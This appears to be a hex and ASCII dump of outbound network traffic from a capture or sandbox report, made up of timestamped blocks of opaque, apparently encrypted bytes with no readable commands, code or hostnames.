                                                                                                                                                                    2023-09-15 20:16:20 UTC496OUTData Raw: 20 c7 87 32 34 ab bf 87 ca d4 8b 27 3c bb 09 99 b8 e0 51 ad f6 fd b1 98 02 57 ca c9 d0 dd c5 f2 43 0d b9 15 92 49 a0 44 1b 97 7e 46 2a 85 da d9 06 f1 98 0c e1 35 26 c3 6a 75 7b a8 da ce b7 bc f6 17 ac c6 97 30 04 86 02 83 04 c8 f2 2d 30 04 98 2f 2a 59 86 99 4c 8e 67 8a fd ea 04 a8 33 4d 02 5b 5f 11 4b fd 50 30 7b 9e 46 77 56 1d 0a 25 35 8e 54 6d 75 76 61 a9 f5 80 0c b3 06 2e f2 a5 70 6c 0a 01 76 13 bb fa 9f a0 f5 5e 77 61 fb 08 3c b1 3e 2a fd 94 08 8e da 90 f3 14 82 d1 db cd f6 ed b7 c0 c0 2a 63 74 3c 29 89 a2 01 ea 53 1c 27 f6 14 71 88 9f 1d cc 42 61 5f 16 7f 1e 9d 9b 13 60 a5 4b dd 3a a8 3b 9a bc 84 dc d8 16 74 88 8e 30 db 8d c4 26 d9 cb f7 bf 2c be 9a f6 02 ea 07 6b ad 00 45 fb 62 4d 34 13 ed d5 f5 10 56 f5 ff 1d 48 ce c4 e3 cc 19 3a 08 ba dd 32 ae 0e
                                                                                                                                                                    Data Ascii: 24'<QWCID~F*5&ju{0-0/*YLg3M[_KP0{FwV%5Tmuva.plv^wa<>**ct<)S'qBa_`K:;t0&,kEbM4VH:2
                                                                                                                                                                    2023-09-15 20:16:20 UTC512OUTData Raw: 97 f0 90 45 ea 9e f5 ea 1b fe d8 ad 50 cb f9 13 c8 a3 0e 27 35 cf b9 f3 3b f4 0f b2 c6 62 31 f0 18 f5 d4 0b 5e 17 97 8b 0b a3 c9 d4 a1 6d a3 8a ed b1 a0 d0 aa 3b 7e 6d ce e6 52 15 29 e8 a7 d1 6f 07 39 8c 8f b0 46 d1 d8 2d 82 11 21 6e 91 ba b2 6e 58 5f 98 b2 f7 a7 3d 7a 67 15 fb a3 2a 4e b8 21 be e4 48 39 82 53 fc b2 6a 61 b2 31 ad 1f 2e f0 df ba 6b e3 22 cc 4c 04 e6 65 30 1c b9 3a 6e 4c 82 ba 97 37 fa 7e 9f a2 90 88 d8 3a 3d c7 a4 2e 1b 96 f3 3a ac c4 a0 dd 89 76 6e eb 92 cb 44 5d 73 ee 0c 54 00 e4 12 d9 95 ce 57 78 8c 2a 7e f9 c8 0b 33 1f f8 4d 84 05 97 e0 86 d3 06 50 54 48 dc 2b f5 f7 95 13 ac eb 1f 29 51 4e 98 5a d6 96 77 30 e7 44 5d e1 c1 70 fc 8b c9 21 b1 28 23 18 75 a5 5b 9a 81 ee 02 cd 58 88 73 ec c3 80 f3 13 1b 2a aa f6 73 14 1e 20 6c ab 10 a8 3e
                                                                                                                                                                    Data Ascii: EP'5;b1^m;~mR)o9F-!nnX_=zg*N!H9Sja1.k"Le0:nL7~:=.:vnD]sTWx*~3MPTH+)QNZw0D]p!(#u[Xs*s l>
                                                                                                                                                                    2023-09-15 20:16:20 UTC528OUTData Raw: 96 97 35 e6 93 c4 92 f5 ce d3 3d e0 35 99 37 2a ec f5 5b be c1 fb c3 b6 40 b5 28 18 d2 4c cd d3 8e 64 0a 75 88 82 1e 27 dd be 3b 2a 41 56 1f 87 b9 ec f1 09 97 6e 24 6f 2b 15 87 97 46 8a b7 22 01 2d 54 e7 16 ca d2 e9 f5 c2 d2 64 64 6b 21 27 f8 db 19 37 52 55 1e 2d 65 54 3f 86 68 fb 10 7f 1a 03 b3 36 b4 6b c7 4e 1a 6b ed 51 81 96 5d 5a 60 ce 88 91 c3 d4 ef a8 56 b3 1a c5 03 17 35 04 f2 3d 8f 01 c6 11 7e 59 09 be 30 60 b3 b5 a3 ef 73 e3 d0 d7 15 96 d5 d8 51 98 8c 2f 12 5d 0a 8b 4d 67 50 0e d9 cc a5 69 bf 64 c7 2f c9 56 c2 74 ef 77 32 73 85 af 5d e1 ce 5b 2b 05 7b 7e 31 8c de 2a cd 97 bc 8e 39 56 b2 47 a9 3e 05 61 5f 6e dd 97 aa 5e 05 f3 00 cf dc 91 7b 39 5d 9d 59 99 fa 36 63 8b 05 d9 8e c7 d0 cf 13 26 cb d9 04 f6 5a c7 15 0e 56 17 3d 31 c9 75 00 f6 97 1d dc
                                                                                                                                                                    Data Ascii: 5=57*[@(Ldu';*AVn$o+F"-Tddk!'7RU-eT?h6kNkQ]Z`V5=~Y0`sQ/]MgPid/Vtw2s][+{~1*9VG>a_n^{9]Y6c&ZV=1u
                                                                                                                                                                    2023-09-15 20:16:20 UTC544OUTData Raw: 0b 5a 2a 4e fd 52 ed e2 8c a8 5b fc c2 57 48 34 41 94 b2 2e dd c6 29 7c 51 74 81 a9 40 82 34 d2 27 df cb df 2a 5b 2a a8 60 b2 55 ba ed 08 cc ac 0b 31 b9 33 9e cb ca 34 dc 84 8a 8e a0 81 e0 87 74 d8 63 8e 9c fc 28 85 58 91 36 d9 a2 e1 f9 c2 3e ce 8f 65 ad c8 a8 9e d8 4e 80 8a 48 6e 76 6c da 0d 68 bd e8 75 4e 9e d1 b9 b7 71 6f 98 01 e5 4b 3f 69 36 92 90 50 de f9 91 63 a3 d8 40 4a 08 31 9d 40 a8 2c 62 cd bb cb 34 67 12 fa fa fb e9 c6 9c 08 57 81 00 01 a2 43 b0 55 5d fd 89 c7 45 5e 86 f0 38 a9 f4 1b c1 74 36 59 ff 7c 29 90 65 65 31 a9 f7 28 48 bd a0 20 cf e8 fd 46 eb cd 51 d4 79 d7 1e f6 5e ed 09 ca 6d da 39 b5 32 20 e8 51 23 e5 c5 ee 5a 9a 20 7d ad 57 c6 f0 80 a0 8e 97 cd c4 a1 58 df 79 4c 33 72 88 ad 1f e8 03 1f bb 96 cb 87 c8 c4 11 0b c4 87 2b eb 8f 81 37
                                                                                                                                                                    Data Ascii: Z*NR[WH4A.)|Qt@4'*[*`U134tc(X6>eNHnvlhuNqoK?i6Pc@J1@,b4gWCU]E^8t6Y|)ee1(H FQy^m92 Q#Z }WXyL3r+7
                                                                                                                                                                    2023-09-15 20:16:20 UTC560OUTData Raw: 9b b7 c6 91 b2 83 84 bd 79 5b 85 6d d9 06 fa 9a 8b 88 88 a0 cc 06 4b 79 bf ac 4b bd 64 09 5b 5a 41 3a 91 e9 92 2a cd c3 d8 38 13 3f 6c 7a 4a 98 bc 98 11 c3 38 1c ff 5b a4 f3 81 64 33 c0 bd 4c f2 cd 51 9f ce e2 1d 5b f5 61 13 85 77 d1 20 de a1 8b 49 59 52 a4 48 cb ec bf 68 cc 0d 40 29 ce 5e 86 85 24 5e be cf 56 f6 c9 90 68 96 b4 4d 53 fd e7 46 65 9f 19 25 80 0e a8 d7 2f 6f 1c 48 b0 f1 a3 3c f6 9a 73 19 1f 8f 12 06 57 d4 ec 83 b6 3e c6 82 4e af 56 ee 1e 02 0e 18 f3 da c4 e3 e2 d1 4f 4a bb 58 54 3f 76 c7 4a 52 86 2b 0d 29 3d 5a 61 ff e6 3b df 3d 18 00 48 5b d5 b6 b5 94 38 62 c3 4a b8 10 6b 94 dc cd 28 c2 12 0e f3 9f df bd 60 33 a8 18 f2 da 33 38 29 02 19 30 d1 c8 0c dd 4a d0 bc 00 40 69 74 0a 2f 25 9a f3 d1 ac e0 02 e5 25 51 ad f6 49 0f e4 66 35 a6 3f 9e c0
                                                                                                                                                                    Data Ascii: y[mKyKd[ZA:*8?lzJ8[d3LQ[aw IYRHh@)^$^VhMSFe%/oH<sW>NVOJXT?vJR+)=Za;=H[8bJk(`338)0J@it/%%QIf5?
                                                                                                                                                                    2023-09-15 20:16:20 UTC576OUTData Raw: 80 32 9c cd 6a a9 04 4c 7a 0c 5e fc 1d 07 17 11 60 c4 ce 37 c6 7d f4 39 53 bb bb 9a eb d0 9e 14 c5 dc 3a 47 42 49 c1 2d 90 e0 26 75 85 a3 73 db 4f d2 e5 4f f5 df 20 7c 85 9a b7 b6 c2 a3 ba e9 8f e2 02 2c 6f 14 25 a0 cd c1 ec 40 93 c4 b8 c7 1d b5 59 24 0a 8d ee d8 f5 b8 3e 48 3b 8c d7 5c 0c 83 53 02 93 55 8c 6b af 76 81 a8 0c da 38 85 58 d4 92 c9 7d 1f 29 b8 52 54 2d 6b c5 6e ea b8 1e 28 64 94 53 b1 ae c8 45 29 a0 62 81 a6 35 c8 19 a5 a7 f0 2e f4 f8 1b 1d c6 9f 75 ce 46 0b 44 46 5c e0 67 3d 44 1e 9b 42 0e 06 28 2d 22 ea 0f ab 86 70 5b 56 59 03 5e 9f 53 1d 65 99 5f 37 df 98 cf 37 e1 cd b2 bc 06 92 8e 6f 2c 1b 87 ca 43 b2 1d 0f 93 a4 aa fa 43 52 24 8d f4 6e 4e bc 99 ed e7 3c 41 94 b2 38 13 bc d2 d3 b3 a8 39 58 d5 9b e3 b2 87 55 09 74 8f 7a cd 12 4f 79 94 3a
                                                                                                                                                                    Data Ascii: 2jLz^`7}9S:GBI-&usOO |,o%@Y$>H;\SUkv8X})RT-kn(dSE)b5.uFDF\g=DB(-"p[VY^Se_77o,CCR$nN<A89XUtzOy:
                                                                                                                                                                    2023-09-15 20:16:20 UTC592OUTData Raw: e9 6d 89 9f fd b3 b1 63 23 bf 22 4f 0d 97 b1 d2 9f 00 9d 4e 86 b8 a7 cd 7b e8 9f a0 66 9e 05 d8 11 f0 5f a5 bd 37 80 2f 2c ca bf ab 54 93 b6 1f ac bb 98 0a e9 c4 90 5e 95 56 2b ff f2 76 a2 22 e9 c9 df 1c 46 43 6b 0f 2c 0c 29 63 6e 8d 5f 32 cc ab f0 48 50 63 ff da ed c9 f6 c6 7c 54 ac c0 40 a2 08 63 f0 70 88 87 6d 43 f6 06 ae 1c 6e ca 22 16 2a 7b 5d 6b 9a 42 d3 40 30 f8 19 8d 51 7f 3f b1 2f 8e 8c c2 b5 92 cc 96 1b d0 54 9e f2 8e 59 6a 92 60 18 a1 b4 15 e5 2a 67 57 6e c6 fa f0 3e 49 d6 48 45 a7 29 45 93 63 e1 63 8d 82 e6 e5 c4 a3 6f c6 00 89 fd 51 62 71 9c b7 97 64 12 80 34 6b 6d 0c ad 11 d9 f7 e9 a7 99 0e e9 3e 38 a6 37 b8 9c 23 d6 55 a3 8d f2 d2 7b 3d b2 1d 40 96 68 19 7d 0b 70 25 5a 4f 3f f2 fc 8e 07 fa 40 a2 89 b5 86 34 f0 8f a2 20 5d 28 af a7 2d 11 e1
                                                                                                                                                                    Data Ascii: mc#"ON{f_7/,T^V+v"FCk,)cn_2HPc|T@cpmCn"*{]kB@0Q?/TYj`*gWn>IHE)EccoQbqd4km>87#U{=@h}p%ZO?@4 ](-
                                                                                                                                                                    2023-09-15 20:16:20 UTC608OUTData Raw: 47 b2 c6 2f 2f bb 2a 8a 0a d6 b5 a4 b3 b9 5e f5 2d f6 23 5c 39 c7 e9 c4 af 79 a1 f7 ba db 5b 06 dc da c5 d5 fa 79 1b 20 ea 50 91 ab 1d fd 8d bc 1c 5e 52 1a 0b ed 98 61 b1 60 f6 c4 ee 20 cb e8 9a 6a 1f f0 6b df 2c d3 98 13 d2 08 df 35 92 c6 8c ce 49 bd 67 47 36 8f 58 c4 52 5b 96 6b 66 78 11 7a 9b d3 a3 7c 06 ea be 72 3f 8a 4d 9c 03 fb 73 94 69 e5 1f ad d9 31 f8 ee 23 17 eb 57 ef 22 07 6d 00 4d f8 9d b7 c8 01 4e 56 a7 03 b4 12 f4 5e 18 3c 32 9e 21 b5 8c e3 d8 8c 04 23 a3 df d0 2c 90 d4 8f aa a6 e4 fd 2e b9 55 6f b4 29 ef 8c 3e bf 55 7a 76 81 58 3f e4 76 ff 44 fc b1 37 4b a9 c7 fb 54 17 fc 16 a5 c1 a3 94 85 34 c4 06 05 e9 cc 4b be ef f4 db 8f da 52 29 59 55 d3 58 94 7e b9 42 da 87 de 86 ad 2a 95 2a db a2 b9 b4 fa 1b 9f 40 30 a7 45 a9 87 df bd 19 66 2f 93 06
                                                                                                                                                                    Data Ascii: G//*^-#\9y[y P^Ra` jk,5IgG6XR[kfxz|r?Msi1#W"mMNV^<2!#,.Uo)>UzvX?vD7KT4KR)YUX~B**@0Ef/
                                                                                                                                                                    2023-09-15 20:16:20 UTC624OUTData Raw: dd 80 9c b3 b7 fe e5 44 0c 41 53 9f 4c 32 09 39 b3 ca 57 c3 87 71 ba b8 7d ad 37 ed 9b 73 2a 15 27 1f 8d 77 68 5b 3a 05 fa 2e 4f b8 bd bc d0 25 14 75 14 94 2d f4 c5 7f dd 05 54 61 56 ec 3b 19 99 03 c4 11 12 9f f4 83 0e 57 68 67 32 44 69 e4 eb 4d 6a 5b 77 13 8e 14 5e f6 d6 2f 5e 78 f2 d0 30 11 7a 4f 0a d8 bd 9c 2e a6 e9 b1 c1 36 6a b9 06 b6 ed 9c e9 cd a4 e8 42 6c 4f 67 59 68 75 28 cf 7b 49 f9 6c c9 28 a5 c9 d0 5f 9a 24 22 89 4c 4a cb fe b4 69 3b fb 1b 40 55 3f a2 ac eb 05 26 1c ee 1f b7 d7 40 2a 7f 85 dc 57 6a 6c 27 67 6a dd 90 29 70 4d 67 86 1c 42 61 99 04 7f 0e e8 cf f4 00 68 39 96 fb 43 52 33 59 6f 56 cb e7 5d a7 eb 6c 2d 38 c8 c6 18 a8 21 50 38 f5 4d 54 30 e5 c2 e8 b8 5d 98 7f 6d 10 88 9b 8c 1a 23 b5 72 72 44 6e fd ae 56 ac 46 3d 4e ec 5b 39 aa 86 67
                                                                                                                                                                    Data Ascii: DASL29Wq}7s*'wh[:.O%u-TaV;Whg2DiMj[w^/^x0zO.6jBlOgYhu({Il(_$"LJi;@U?&@*Wjl'gj)pMgBah9CR3YoV]l-8!P8MT0]m#rrDnVF=N[9g
                                                                                                                                                                    2023-09-15 20:16:20 UTC640OUTData Raw: 8f 44 da b1 af 1c 5e d0 e2 f7 b8 7b 32 d5 cd 54 4b 0f 15 9e fd 61 a5 8b b4 88 d3 31 2e 81 9e 29 09 bc 88 b5 91 b6 93 88 bf e3 ba da 1f 4c 7d 60 c9 b2 f1 dc f5 24 48 73 43 4a f7 db 27 68 d6 81 b6 f5 d1 c6 37 52 ff 02 3b be fe 31 66 6c 62 4c 34 a7 9b ea fe ad 23 bb 65 29 b8 c8 c7 5b 13 ca f6 a1 52 d5 f6 bf 31 ca 04 2a 83 d2 45 c0 77 67 96 1b 7e fe e1 78 de 1e f9 6f e4 2a e7 16 e9 23 17 d4 79 0c 1e dd 5c d3 d7 5a f8 4c 87 73 9b 81 ac 19 ee ac bd 98 78 f6 ba 8e 87 99 27 c7 2e 04 3d ca 89 60 81 f6 96 3f ab 11 3b 35 f3 84 57 fa 37 40 b1 f5 a4 04 4b 7d ca bd c4 86 87 49 9e b5 db 26 78 e2 3b fc 73 4d e9 40 00 b5 a9 9f 83 46 b0 10 3c 2d 33 df a4 61 ba 52 29 18 29 24 33 4d 90 4b d3 5d cb 90 d8 d1 66 3a e3 28 07 2f bd f9 4a 91 49 8a 2d 64 77 dd fa e3 4b e7 b9 9b 08
                                                                                                                                                                    Data Ascii: D^{2TKa1.)L}`$HsCJ'h7R;1flbL4#e)[R1*Ewg~xo*#y\ZLsx'.=`?;5W7@K}I&x;sM@F<-3aR))$3MK]f:(/JI-dwK
                                                                                                                                                                    2023-09-15 20:16:20 UTC656OUTData Raw: ca fb f5 31 1c 0a aa 2e 64 14 56 40 f1 5b 2b 08 9e 6d 0a fc d5 a8 af 23 64 b0 eb 08 4c a9 8b 33 6e 55 1f 4b 1e 9f 2e 7f ec f6 b3 57 8c 23 f5 36 f9 e2 78 2e 15 f4 43 55 47 56 55 3c 83 9a 2b de 7a d6 98 8b 4c bc 68 36 2c 72 d9 08 9f 05 09 60 f7 00 e2 67 56 0b d5 78 2c 4a ba ad ca fa 65 e4 1d 9f 3b ba 9b 98 24 3d 0d 1f 8f 91 22 38 70 3a bd f4 29 d0 ad 16 b6 51 09 23 4b 8a 01 50 92 fc 3a 14 40 0c 42 b5 02 f4 07 7c b1 53 27 57 16 b7 ff d7 6d ae b1 0f 47 bf db c1 65 06 8c 5d 0b 0a b6 c8 8e 65 26 08 b4 e8 49 99 4b 1c a2 ad b6 24 1b 00 5f 0a da 25 df 48 95 c5 3b 06 21 7b b6 96 34 2b 46 d0 6c 13 14 a7 76 28 0e 28 09 6d 4c 17 4f c7 00 32 fa c4 64 8c 31 ed 1e 9a 9d ff 23 50 7d 81 c7 f1 7f 45 5d 8c bc 90 ea ab 04 5e f9 ec 6b ce 46 ad 89 61 91 ed 80 ca 07 9a 4e d5 fc
                                                                                                                                                                    Data Ascii: 1.dV@[+m#dL3nUK.W#6x.CUGVU<+zLh6,r`gVx,Je;$="8p:)Q#KP:@B|S'WmGe]e&IK$_%H;!{4+Flv((mLO2d1#P}E]^kFaN
                                                                                                                                                                    2023-09-15 20:16:20 UTC672OUTData Raw: d5 db 48 6c 80 c3 fe 32 c8 e9 ce 43 08 ac 2b f2 6f bb 94 43 5b de 1a 80 a9 80 e2 6e ff f2 b3 f6 c0 8d ab e0 71 b6 2e b0 7c 18 90 c0 78 62 6a 56 cd b7 4a a8 e7 bb 2e 31 31 e0 39 8f f9 39 f9 c0 e8 6a 5e 84 9c 8c a0 51 59 90 1d b4 68 34 a2 bd 86 07 b3 20 31 bc 24 03 b0 48 39 36 9e 6e 64 f9 32 2f 6f 5e 64 45 b9 a8 9b 01 a4 e2 9d d2 28 dd 8b 9f 6e f1 c5 7d 2f e2 ca 6f 9d 99 43 60 54 1c 91 1f 60 2d bf b5 bb 03 10 64 b7 33 80 66 96 8a c2 26 d9 d4 ec ca b1 98 16 f0 7e 4b 02 ef a6 11 6b 4b 40 76 21 88 06 3e fb 90 61 05 e4 19 13 7f 6b 31 74 6b 48 dc fd 43 c5 c5 40 12 57 ba 41 32 f4 8f 9d af b6 87 60 c4 65 ed 0f 96 a9 4a 95 26 bc b4 59 ca 7b 58 4d 72 71 a8 6e 3e 1b 16 86 e0 2e b8 dc 94 a6 32 5a bd 40 10 fb 45 ff 55 cb 41 c7 fe d6 13 99 8c 91 6a 50 63 46 44 83 cd 00
                                                                                                                                                                    Data Ascii: Hl2C+oC[nq.|xbjVJ.1199j^QYh4 1$H96nd2/o^dE(n}/oC`T`-d3f&~KkK@v!>ak1tkHC@WA2`eJ&Y{XMrqn>.2Z@EUAjPcFD
                                                                                                                                                                    2023-09-15 20:16:20 UTC688OUTData Raw: 6e d2 46 84 27 28 02 19 4d d6 4b 2d ee 45 cf ac b1 d7 07 ec 5a 86 d4 9f b0 9b 3c 69 d6 13 4a c1 05 c7 91 52 7d 8d ae 25 8a 41 20 22 f3 b5 f0 68 5d 5b d2 a2 fb 60 e0 87 82 5f 59 b2 5c 17 9e eb 13 47 30 0d b3 01 cd 7d 9b d3 8b 1f 38 bb e3 f5 25 80 8e 68 fc ee b9 88 a4 1c 05 27 7a 16 dd 39 fb cc f5 2c 23 dc f1 db 41 08 0b 86 dd 65 60 ee 14 c3 46 d4 56 7c f2 76 9b 38 81 7b aa 26 61 6e 77 16 8f 0b 32 bb a2 c5 38 7d 34 e2 44 2d 58 90 ee 6c 46 e1 42 22 d2 bc 91 47 14 bf d6 fd c4 3c bf 65 13 14 21 f3 f3 1a ca c8 ae 04 3e da b9 ce 37 5b 2a 33 b4 dd e2 cd fb 84 bb 9f 81 b3 51 77 76 8b a5 94 e9 51 e7 dd b9 23 c8 e0 da f7 39 ac a5 6e 69 76 57 53 c4 53 cc f2 3a 64 64 3e ad 64 1c 22 b9 e0 fb 01 ba 2b cd 2c 98 2c 53 65 f9 5d 71 b1 f7 59 25 86 6b 11 9d e1 fc 09 21 f0 3b
                                                                                                                                                                    Data Ascii: nF'(MK-EZ<iJR}%A "h][`_Y\G0}8%h'z9,#Ae`FV|v8{&anw28}4D-XlFB"G<e!>7[*3QwvQ#9nivWSS:dd>d"+,,Se]qY%k!;
                                                                                                                                                                    2023-09-15 20:16:20 UTC704OUTData Raw: 54 50 ca 77 e4 15 24 74 ba 5c 9e 4b e3 d1 10 0a 3d 0a c5 31 9f e2 cf 92 c3 07 09 b1 71 45 06 36 59 c0 67 1c 65 55 79 79 74 e4 c0 02 09 bd 79 4f f8 be 65 6a f3 b3 00 c8 67 ca 5d 79 d0 0b 6b 53 b2 81 73 ef 56 c1 7b db f2 01 15 b0 8b fd 8a 59 bf c4 ee d6 ec 2a 5f c3 25 39 1a 5a 3f b8 1c 31 99 c3 00 a4 5a 4a 77 46 fe 9e 99 e1 0f 15 73 67 d8 65 b1 2d d2 88 07 0d 19 74 dc 93 c7 09 0a 63 e1 a2 9e 49 47 5e 0c ee 8e ed 82 c9 63 2a d8 24 a0 3c 17 62 4d fb b5 1a f0 de 65 d8 38 a4 5c 46 14 3c c2 5e 1a d8 bf dd 61 a2 76 37 79 38 11 b2 bb dc 9e ac 08 f2 c6 03 64 32 f5 0f 01 4a 4b 3f 62 d9 7b 71 c7 11 f9 c9 c4 66 66 43 d0 d1 28 48 fa 0c 0c 2b 50 a8 dd de 1d e8 62 fb a4 5f 4e c7 fa ec bb d5 42 b7 ad c3 ad 5b 83 47 ba cc d1 b0 e4 7b d1 ba 9f b7 61 af c2 95 e2 14 bd 16 cf
                                                                                                                                                                    Data Ascii: TPw$t\K=1qE6YgeUyytyOejg]ykSsV{Y*_%9Z?1ZJwFsge-tcIG^c*$<bMe8\F<^av7y8d2JK?b{qffC(H+Pb_NB[G{a
                                                                                                                                                                    2023-09-15 20:16:20 UTC720OUTData Raw: db 36 95 76 8b c6 56 ee 6a e7 eb 12 52 af 4c b0 48 23 5b ec 53 bd b4 6a 6c 0b 48 0e d8 0d 5e d7 f7 99 40 41 d8 bf 6a 0a 6b a4 90 6f 3a 18 4c 57 23 39 42 68 d5 b3 b2 41 aa c1 4b 85 83 15 e4 b2 d9 e0 ac 35 4f 86 c8 a1 83 31 b1 da eb ed db f9 93 98 3f 76 cf 44 3d 7d 67 8c 98 08 70 50 6c 56 53 95 8e 26 f0 da c8 ef 1d 87 d1 68 a4 81 67 15 86 60 76 a4 2d 66 f4 ef 75 87 67 13 af cd ad 77 01 cf 5e 54 23 ea 53 d5 f8 ca ed 9a ac ad 51 81 15 62 1a 97 d6 bd 88 75 e1 2b af 8c 2b c3 14 42 4a 52 95 c5 1f bc 77 46 38 e2 6f 23 e6 a0 53 f0 ed a2 3b 69 f2 23 6e fa 41 3e 99 22 30 9e db 82 25 b5 97 06 a1 aa 32 88 06 fb e3 3f 12 7d dd 75 55 e1 29 61 ee 2a de a6 31 20 1b 54 6a 8f e2 49 45 0a 10 cf c5 e4 73 a7 40 4d e8 6b bf 07 59 e3 72 24 b2 d6 bf 82 72 81 b2 7e 7f fa 51 ce 3f
                                                                                                                                                                    Data Ascii: 6vVjRLH#[SjlH^@Ajko:LW#9BhAK5O1?vD=}gpPlVS&hg`v-fugw^T#SQbu++BJRwF8o#S;i#nA>"0%2?}uU)a*1 TjIEs@MkYr$r~Q?
                                                                                                                                                                    2023-09-15 20:16:20 UTC736OUTData Raw: fe 7f c4 d2 70 d5 f6 a7 52 d6 43 ef 3c b6 66 3b a5 6f 7e 5d ec d1 cb 8e 89 30 fd b7 98 a4 55 f0 03 d4 83 d6 66 cf ed 96 c6 e8 70 d1 30 8f 82 76 cb b7 37 11 0f 88 07 4a e9 ff 55 ed 60 a9 8f 4e 60 00 de 42 05 76 1e 79 82 a6 1f 53 1a 07 93 b0 5e e8 04 be 30 f3 67 75 01 db e4 8a 05 64 53 07 c9 c0 22 e3 f8 9b 28 2b f7 19 97 b1 6e 7a c8 98 ed 46 d5 3a 8c 9a 43 b8 b6 fd 5a 03 58 a3 0d 18 6f c0 44 1f 52 10 24 94 da 52 74 22 1d e4 c6 1d eb e8 2f 5b 83 ad 6e 0a c7 5b ec 8b a8 21 72 35 5a 43 0e 9c 26 22 8b ad e3 7d 7e 59 1d 24 a3 87 40 3b 73 18 48 e7 08 06 6d 4c c8 74 67 5c 8a 47 12 68 7e 07 51 53 97 49 aa 17 4c d4 1a fb 00 e2 60 df 29 61 76 ba cd 79 e8 ef 6a 70 b0 65 b0 82 31 e3 58 d1 4f f5 58 8a e0 4f be fd 48 d6 37 f0 83 ab 7b 27 77 b8 3a 28 16 db 90 c7 a3 08 ba
                                                                                                                                                                    Data Ascii: pRC<f;o~]0Ufp0v7JU`N`BvyS^0gudS"(+nzF:CZXoDR$Rt"/[n[!r5ZC&"}~Y$@;sHmLtg\Gh~QSIL`)avyjpe1XOXOH7{'w:(
                                                                                                                                                                    2023-09-15 20:16:20 UTC752OUTData Raw: d3 ec b2 f5 6e 4c 1d dc 52 cb 86 21 50 bd 49 f7 36 77 c6 e6 85 94 44 56 19 ee ee a3 1d 3f 4c fd 48 9b 77 46 47 b1 98 18 b8 e5 20 61 1d 58 5f ab 9d 9e c7 32 3c ea 87 5f ef 6e 1c 9e 8b 54 26 3c 1d 89 7b 1c 53 df f8 da 78 16 8e 1a 3a b6 2e 60 2c 90 2a 91 c1 2a af b4 dd 41 61 a0 16 87 3c 66 bc 2f 88 6c f4 b2 61 b0 3e e7 76 08 92 a3 cb 08 a8 1b fc ef df 06 32 94 55 ac 31 24 e4 69 3a ba a3 ae 7d bb 14 06 c1 69 86 24 9a 06 82 5b 01 a7 93 9c 43 85 92 ad bb 7a de 70 a9 87 25 b7 a8 8b ff 53 8d 75 e3 34 e1 e9 37 2a 73 d7 14 4b c3 13 7a d5 56 d6 91 07 f0 55 7a e0 9f 62 75 d3 fd d0 5f d2 c9 ef 3d 42 70 ea b3 d8 ad 70 c5 ce 5c 34 d5 61 5a e9 e4 b6 72 37 67 55 ba 5c 2d 5e 1f ce 34 1d b3 f9 5f 69 74 9a c2 30 32 2f 12 d6 bf e5 8d 73 5d 68 5d 50 51 49 42 ff 3b 4c 3d 19 0d
                                                                                                                                                                    Data Ascii: nLR!PI6wDV?LHwFG aX_2<_nT&<{Sx:.`,**Aa<f/la>v2U1$i:}i$[Czp%Su47*sKzVUzbu_=Bpp\4aZr7gU\-^4_it02/s]h]PQIB;L=
                                                                                                                                                                    2023-09-15 20:16:20 UTC768OUTData Raw: 13 c1 ef dc 94 06 fd 40 ae 07 ba 0a bc ce 67 0e a5 a2 9e 15 12 b4 24 f5 39 9c d0 a8 5f 2b 64 ad 4d ae af 47 f7 18 90 7a b8 43 9e 7c 7f 3d 83 be 89 18 90 19 81 53 8a c6 ee af f0 cd 6b 51 fa 7e e9 b4 3a 4e ac 61 9b b6 ef 5b 9a 6b b0 1b 57 dc 50 d5 30 35 e7 89 03 16 66 eb c3 79 f9 c6 7a 00 82 6d df 3b c5 64 bc db 80 ab 44 36 3b cc e7 cd 67 ca cb eb 3c c0 82 72 5b 05 38 51 e0 56 38 51 60 3e b1 39 0b 61 ed 63 f1 18 99 9e 41 b9 d3 38 a7 e6 9c 63 c6 07 4d 55 e5 44 4e 8f 46 c0 51 89 7e 11 85 b0 80 a5 c1 5a de 5c 3b a5 d7 91 e8 9a 44 cd 62 cc e2 37 b1 19 32 8c e5 e6 64 b7 46 a5 d2 53 7c 64 be 8b 61 7d 21 83 59 8d cc 28 f1 fd f4 0b bd ed 7d b2 03 01 b7 e2 32 87 41 39 ca 80 05 b5 36 23 8d 90 ec 50 87 32 ce 9a 10 16 38 db 02 bc 5d 55 33 58 2e 29 0b 6e 26 e6 ec 04 d5
                                                                                                                                                                    Data Ascii: @g$9_+dMGzC|=SkQ~:Na[kWP05fyzm;dD6;g<r[8QV8Q`>9acA8cMUDNFQ~Z\;Db72dFS|da}!Y(}2A96#P28]U3X.)n&
                                                                                                                                                                    2023-09-15 20:16:20 UTC784OUTData Raw: e5 b5 bd db 35 a3 63 9c 13 61 58 92 ae 74 61 d4 1a 8e 71 00 b9 01 e3 34 30 bb e3 87 90 00 10 fd 34 df 50 1f 19 86 b0 56 b9 8b ad 31 70 a0 54 16 65 40 98 8a ac 3e 19 bf 49 87 34 e2 96 68 7c 28 68 fd 1a be 3c 8f 91 8d 62 4a 27 90 1d 0e 52 76 72 90 7b e6 28 88 22 a2 38 5b 2b a5 e6 e3 88 fc 97 89 5d 8d f5 97 d9 6f b5 dc 94 70 75 03 06 d8 53 68 a1 26 67 aa f2 9d d7 fe df 55 39 09 f0 43 9e 8d 0e 6a ee 3c 05 cb 47 55 ba 91 0a 83 29 7d fe 6e 5f cc 3e 78 da 84 86 7b 93 bf 4d 66 f1 95 a0 27 5e 46 44 46 3e 83 78 a0 c2 68 a9 3f 73 b8 24 a6 e5 30 f4 86 97 93 58 5c b9 74 62 7e e4 e4 d3 a8 2b a9 c0 35 03 5a 5f 2f 99 cc 56 aa 07 97 46 46 a1 33 b8 2b a9 71 6f df ea 30 e1 16 fc 4c 0a c7 e9 58 2b 79 22 11 9c c4 ec bb db c3 cf de ff 13 ac 6a c8 5d 7e 70 52 9c d0 93 04 78 9f
                                                                                                                                                                    Data Ascii: 5caXtaq404PV1pTe@>I4h|(h<bJ'Rvr{("8[+]opuSh&gU9Cj<GU)}n_>x{Mf'^FDF>xh?s$0X\tb~+5Z_/VFF3+qo0LX+y"j]~pRx
